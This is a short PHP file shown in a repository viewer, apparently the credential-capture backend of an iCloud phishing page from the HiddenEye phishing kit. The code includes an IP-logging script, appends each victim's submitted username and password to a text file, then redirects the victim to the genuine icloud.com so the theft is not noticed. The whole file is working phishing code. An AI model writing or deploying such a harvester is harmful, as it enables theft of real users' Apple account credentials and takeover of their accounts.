HiddenEye-Legacy/WebPages/iCloud/login.php

7 lines
204 B
PHP
Raw Normal View History

2018-07-12 19:58:13 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://icloud.com');
exit();